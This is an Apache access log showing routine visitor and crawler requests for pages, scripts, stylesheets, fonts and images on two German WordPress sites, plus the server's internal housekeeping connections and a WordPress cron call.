91.41.169.0 - - [06/Nov/2023:01:40:42 +0100] "GET /wp-content/themes/en-vision/lib/patterns/escheresque_ste.png HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:40:42 +0100] "GET /wp-content/uploads/logo-2-3.png HTTP/1.1" 200 15255 "https://www.computerdoc24.de/aktuelle-angebote/page/2/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:40:42 +0100] "GET /wp-content/uploads/appleipadretina-6.png HTTP/1.1" 200 7645 "https://www.computerdoc24.de/aktuelle-angebote/page/2/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:40:42 +0100] "GET /wp-content/uploads/favicon-3.png HTTP/1.1" 200 944 "https://www.computerdoc24.de/aktuelle-angebote/page/2/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:40:42 +0100] "POST /?wc-ajax=get_refreshed_fragments HTTP/1.1" 200 177 "https://www.computerdoc24.de/aktuelle-angebote/page/2/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
:: - - [06/Nov/2023:01:40:47 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 (internal dummy connection)"
:: - - [06/Nov/2023:01:40:48 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 (internal dummy connection)"
:: - - [06/Nov/2023:01:40:49 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 (internal dummy connection)"
91.41.169.0 - - [06/Nov/2023:01:40:51 +0100] "GET /aktuelle-angebote/ HTTP/1.1" 200 13458 "https://www.computerdoc24.de/aktuelle-angebote/page/2/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:40:52 +0100] "GET /wp-content/themes/en-vision/lib/js/jquery-isotope.min.js HTTP/1.1" 200 9692 "https://www.computerdoc24.de/aktuelle-angebote/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:40:53 +0100] "GET /wp-content/uploads/logitech_k120-570x321.jpg HTTP/1.1" 200 19579 "https://www.computerdoc24.de/aktuelle-angebote/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:40:53 +0100] "GET /wp-content/themes/en-vision/includes/modules/module.shadow/shadows/shadow-6.png HTTP/1.1" 200 5589 "https://www.computerdoc24.de/aktuelle-angebote/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:40:53 +0100] "GET /wp-content/uploads/20200603_115624-570x321.jpg HTTP/1.1" 200 41702 "https://www.computerdoc24.de/aktuelle-angebote/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:40:53 +0100] "GET /wp-content/uploads/logitech_maus-570x321.jpg HTTP/1.1" 200 7531 "https://www.computerdoc24.de/aktuelle-angebote/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:40:53 +0100] "GET /wp-content/uploads/logitech_mk270-570x321.jpg HTTP/1.1" 200 17396 "https://www.computerdoc24.de/aktuelle-angebote/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:40:53 +0100] "GET /wp-content/uploads/logitech_s-120-570x321.jpg HTTP/1.1" 200 24602 "https://www.computerdoc24.de/aktuelle-angebote/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:40:58 +0100] "GET /wp-content/themes/en-vision/includes/modules/module.fontawesome/source/font/fontawesome-webfont.woff?v=3.2.1 HTTP/1.1" 200 43572 "https://www.computerdoc24.de/wp-content/themes/en-vision/includes/modules/module.fontawesome/source/css/font-awesome.min.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
:: - - [06/Nov/2023:01:41:03 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 (internal dummy connection)"
91.41.169.0 - - [06/Nov/2023:01:41:07 +0100] "GET /service/ HTTP/1.1" 200 16019 "https://www.computerdoc24.de/aktuelle-angebote/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:08 +0100] "GET /wp-content/plugins/js_composer/assets/css/js_composer.min.css HTTP/1.1" 200 45591 "https://www.computerdoc24.de/service/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:08 +0100] "GET /wp-content/plugins/Ultimate_VC_Addons/assets/min-css/ultimate.min.css HTTP/1.1" 200 47736 "https://www.computerdoc24.de/service/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:08 +0100] "GET /wp-content/plugins/Ultimate_VC_Addons/assets/min-js/ultimate.min.js HTTP/1.1" 200 54140 "https://www.computerdoc24.de/service/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:09 +0100] "GET /wp-includes/js/comment-reply.min.js HTTP/1.1" 200 1044 "https://www.computerdoc24.de/service/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:09 +0100] "GET /wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js HTTP/1.1" 200 5653 "https://www.computerdoc24.de/service/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:09 +0100] "GET /wp-content/uploads/services-1.jpg HTTP/1.1" 200 45657 "https://www.computerdoc24.de/service/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:11 +0100] "GET /wp-content/uploads/meeting-1.jpg HTTP/1.1" 200 47942 "https://www.computerdoc24.de/service/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:13 +0100] "GET /aktuelle-angebote/ HTTP/1.1" 200 13458 "https://www.computerdoc24.de/service/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
:: - - [06/Nov/2023:01:41:18 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 (internal dummy connection)"
81.169.178.0 - - [06/Nov/2023:01:41:47 +0100] "POST /wp-cron.php?doing_wp_cron=1699231307.6723849773406982421875 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699231307.6723849773406982421875" "WordPress/5.2.19; https://www.computerdoc24.de"
91.41.169.0 - - [06/Nov/2023:01:41:47 +0100] "GET / HTTP/1.1" 200 20476 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:48 +0100] "GET /wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css HTTP/1.1" 200 6970 "https://www.computerdoc24.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:49 +0100] "GET /wp-content/plugins/revslider/public/assets/fonts/revicons/revicons.woff?5510888 HTTP/1.1" 200 7491 "https://www.computerdoc24.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:49 +0100] "GET /wp-content/plugins/revslider/public/assets/fonts/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1" 200 77162 "https://www.computerdoc24.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:49 +0100] "GET /wp-content/plugins/revslider/public/assets/fonts/font-awesome/css/font-awesome.css HTTP/1.1" 200 7235 "https://www.computerdoc24.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:49 +0100] "GET /wp-content/plugins/revslider/public/assets/assets/dummy.png HTTP/1.1" 200 68 "https://www.computerdoc24.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:49 +0100] "GET /wp-content/plugins/revslider/public/assets/js/rbtools.min.js HTTP/1.1" 200 46966 "https://www.computerdoc24.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:49 +0100] "GET /wp-content/plugins/revslider/public/assets/js/rs6.min.js HTTP/1.1" 200 98542 "https://www.computerdoc24.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:49 +0100] "GET /wp-content/plugins/js_composer/assets/lib/bower/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1" 200 77160 "https://www.computerdoc24.de/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:49 +0100] "GET /wp-content/plugins/shapepress-dsgvo/public/css/fonts/roboto/Roboto-Regular-webfont.woff HTTP/1.1" 200 20924 "https://www.computerdoc24.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:49 +0100] "GET /wp-content/themes/en-vision/lib/images/sidebar-shadow-right.png HTTP/1.1" 200 534 "https://www.computerdoc24.de/wp-content/themes/en-vision/lib/css/style.min.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:49 +0100] "GET /wp-content/uploads/smile_fonts/Defaults/Defaults.woff?rfa9z8 HTTP/1.1" 200 144232 "https://www.computerdoc24.de/wp-content/uploads/smile_fonts/Defaults/Defaults.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:49 +0100] "GET /wp-content/plugins/revslider/public/assets/assets/loader.gif HTTP/1.1" 200 2545 "https://www.computerdoc24.de/wp-content/plugins/revslider/public/assets/css/rs6.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:49 +0100] "GET /wp-content/uploads/revslider/homepage/bg-1.jpg HTTP/1.1" 200 41555 "https://www.computerdoc24.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:49 +0100] "GET /wp-content/uploads/revslider/homepage/slider.png HTTP/1.1" 200 18173 "https://www.computerdoc24.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:49 +0100] "GET /wp-content/uploads/Network-1.png HTTP/1.1" 200 55283 "https://www.computerdoc24.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:49 +0100] "GET /wp-content/uploads/revslider/homepage/bg3.jpg HTTP/1.1" 200 189591 "https://www.computerdoc24.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:50 +0100] "GET /wp-content/uploads/revslider/homepage/hppc-1.png HTTP/1.1" 200 117566 "https://www.computerdoc24.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:50 +0100] "GET /wp-content/uploads/bg2-1-1.jpg HTTP/1.1" 200 470201 "https://www.computerdoc24.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:50 +0100] "GET /wp-content/uploads/revslider/homepage/computer.png HTTP/1.1" 200 206463 "https://www.computerdoc24.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:50 +0100] "GET /wp-content/uploads/zwanzigjahrecomputerdoc24-1-300x258.png HTTP/1.1" 200 29230 "https://www.computerdoc24.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:51 +0100] "GET /wp-content/uploads/20200603_115624-300x300.jpg HTTP/1.1" 200 22167 "https://www.computerdoc24.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
:: - - [06/Nov/2023:01:41:56 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 (internal dummy connection)"
91.41.169.0 - - [06/Nov/2023:01:41:57 +0100] "GET /aktuelle-angebote/ HTTP/1.1" 200 13458 "https://www.computerdoc24.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:58 +0100] "GET /wp-content/cache/autoptimize/js/autoptimize_single_902b7ca09549975e55e136fb0026df9a.js HTTP/1.1" 200 319 "https://www.computerdoc24.de/aktuelle-angebote/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
91.41.169.0 - - [06/Nov/2023:01:41:58 +0100] "GET /wp-content/uploads/appleipadretina-6.png HTTP/1.1" 200 7645 "https://www.computerdoc24.de/aktuelle-angebote/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
46.228.199.0 - - [06/Nov/2023:01:42:23 +0100] "GET / HTTP/1.1" 200 16118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54"
168.91.32.0 - - [06/Nov/2023:01:44:35 +0100] "GET /unsere-maerkte/drehkreuze-service-partner HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
168.91.32.0 - - [06/Nov/2023:01:44:35 +0100] "GET /unsere-maerkte/drehkreuze-service-partner/ HTTP/1.1" 200 11107 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
168.91.32.0 - - [06/Nov/2023:01:44:36 +0100] "GET /wp-includes/css/dist/block-library/style.min.css HTTP/1.1" 200 10523 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
168.91.32.0 - - [06/Nov/2023:01:44:36 +0100] "GET /wp-content/plugins/contact-form-7/includes/css/styles.css HTTP/1.1" 200 932 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
198.20.180.0 - - [06/Nov/2023:01:44:36 +0100] "GET /wp-content/plugins/easy-fancybox/css/jquery.fancybox.min.css HTTP/1.1" 200 1111 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
23.229.73.0 - - [06/Nov/2023:01:44:36 +0100] "GET /wp-content/plugins/revslider/public/assets/css/rs6.css HTTP/1.1" 200 12698 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
199.34.84.0 - - [06/Nov/2023:01:44:36 +0100] "GET /wp-content/plugins/js_composer/assets/css/js_composer.min.css HTTP/1.1" 200 45790 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
168.91.32.0 - - [06/Nov/2023:01:44:36 +0100] "GET /wp-content/uploads/smile_fonts/Defaults/Defaults.css HTTP/1.1" 200 4755 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
138.229.108.0 - - [06/Nov/2023:01:44:36 +0100] "GET /wp-content/plugins/complianz-gdpr/assets/css/cookieconsent.min.css HTTP/1.1" 200 3429 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
198.20.180.0 - - [06/Nov/2023:01:44:36 +0100] "GET /wp-content/themes/lhst/lib/css/style.min.css HTTP/1.1" 200 38395 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
23.229.73.0 - - [06/Nov/2023:01:44:37 +0100] "GET /wp-content/themes/lhst/includes/modules/module.fontawesome/source/css/font-awesome.min.css HTTP/1.1" 200 4680 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
207.182.28.0 - - [06/Nov/2023:01:44:37 +0100] "GET /wp-content/themes/lhst/lib/css/bootstrap-responsive-1170.min.css HTTP/1.1" 200 1157 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
168.91.32.0 - - [06/Nov/2023:01:44:37 +0100] "GET /wp-content/themes/lhst/includes/modules/module.icomoon/source/css/icomoon.css HTTP/1.1" 200 8420 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
138.229.108.0 - - [06/Nov/2023:01:44:37 +0100] "GET /wp-content/plugins/wpglobus/includes/css/wpglobus.css HTTP/1.1" 200 501 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
23.229.73.0 - - [06/Nov/2023:01:44:37 +0100] "GET /wp-content/uploads/Default-Skin_54ce98c851b37c14ba88fe891dd1e475.css?lXZVpV0jtP HTTP/1.1" 200 4314 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
199.34.84.0 - - [06/Nov/2023:01:44:37 +0100] "GET /wp-includes/js/jquery/jquery.min.js HTTP/1.1" 200 30908 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
207.182.28.0 - - [06/Nov/2023:01:44:37 +0100] "GET /wp-includes/js/jquery/jquery-migrate.min.js HTTP/1.1" 200 4169 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
198.20.180.0 - - [06/Nov/2023:01:44:37 +0100] "GET /wp-content/plugins/revslider/public/assets/js/rbtools.min.js HTTP/1.1" 200 46967 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
138.229.108.0 - - [06/Nov/2023:01:44:37 +0100] "GET /wp-content/plugins/revslider/public/assets/js/rs6.min.js HTTP/1.1" 200 86246 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
168.91.32.0 - - [06/Nov/2023:01:44:37 +0100] "GET /wp-includes/js/utils.min.js HTTP/1.1" 200 828 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
168.91.32.0 - - [06/Nov/2023:01:44:37 +0100] "GET /wp-content/themes/lhst/lib/js/app.min.js HTTP/1.1" 200 31102 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
138.229.108.0 - - [06/Nov/2023:01:44:38 +0100] "GET /wp-content/themes/lhst/includes/modules/module.to_top/source/to_top.js HTTP/1.1" 200 758 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
23.229.73.0 - - [06/Nov/2023:01:44:38 +0100] "GET /wp-content/plugins/easy-fancybox/js/jquery.fancybox.min.js HTTP/1.1" 200 6330 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
199.34.84.0 - - [06/Nov/2023:01:44:38 +0100] "GET /wp-content/plugins/contact-form-7/includes/js/index.js HTTP/1.1" 200 4071 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
198.20.180.0 - - [06/Nov/2023:01:44:38 +0100] "GET /wp-includes/js/dist/vendor/regenerator-runtime.min.js HTTP/1.1" 200 2398 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
207.182.28.0 - - [06/Nov/2023:01:44:38 +0100] "GET /wp-includes/js/dist/vendor/wp-polyfill.min.js HTTP/1.1" 200 6031 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
23.229.73.0 - - [06/Nov/2023:01:44:38 +0100] "GET /wp-content/themes/lhst/includes/modules/module.fontawesome/source/font/fontawesome-webfont.woff?v=3.2.1 HTTP/1.1" 200 43568 "https://www.ipcbusiness.de/wp-content/themes/lhst/includes/modules/module.fontawesome/source/css/font-awesome.min.css" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
198.20.180.0 - - [06/Nov/2023:01:44:38 +0100] "GET /wp-content/themes/lhst/includes/modules/module.icomoon/source/font/Icomoon.woff HTTP/1.1" 200 242522 "https://www.ipcbusiness.de/wp-content/themes/lhst/includes/modules/module.icomoon/source/css/icomoon.css" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
199.34.84.0 - - [06/Nov/2023:01:44:38 +0100] "GET /wp-content/plugins/complianz-gdpr/assets/js/cookieconsent.min.js HTTP/1.1" 200 7678 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
138.229.108.0 - - [06/Nov/2023:01:44:38 +0100] "GET /wp-content/uploads/bbg.jpg HTTP/1.1" 200 169409 "https://www.ipcbusiness.de/wp-content/uploads/Default-Skin_54ce98c851b37c14ba88fe891dd1e475.css?lXZVpV0jtP" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
207.182.28.0 - - [06/Nov/2023:01:44:38 +0100] "GET /wp-content/plugins/complianz-gdpr/assets/js/complianz.min.js HTTP/1.1" 200 8645 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
168.91.32.0 - - [06/Nov/2023:01:44:38 +0100] "GET /wp-content/plugins/wpglobus/includes/js/wpglobus.min.js HTTP/1.1" 200 362 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
199.34.84.0 - - [06/Nov/2023:01:44:38 +0100] "GET /wp-includes/js/wp-embed.min.js HTTP/1.1" 200 804 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
23.229.73.0 - - [06/Nov/2023:01:44:38 +0100] "GET /wp-content/themes/lhst/lib/js/jquery-smoothscroll.min.js HTTP/1.1" 200 2546 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
207.182.28.0 - - [06/Nov/2023:01:44:38 +0100] "GET /wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js HTTP/1.1" 200 5816 "https://www.ipcbusiness.de/unsere-maerkte/drehkreuze-service-partner/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
198.20.180.0 - - [06/Nov/2023:01:44:38 +0100] "GET /wp-content/uploads/head.png HTTP/1.1" 200 108185 "https://www.ipcbusiness.de/wp-content/uploads/Default-Skin_54ce98c851b37c14ba88fe891dd1e475.css?lXZVpV0jtP" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5478.0 Safari/537.36"
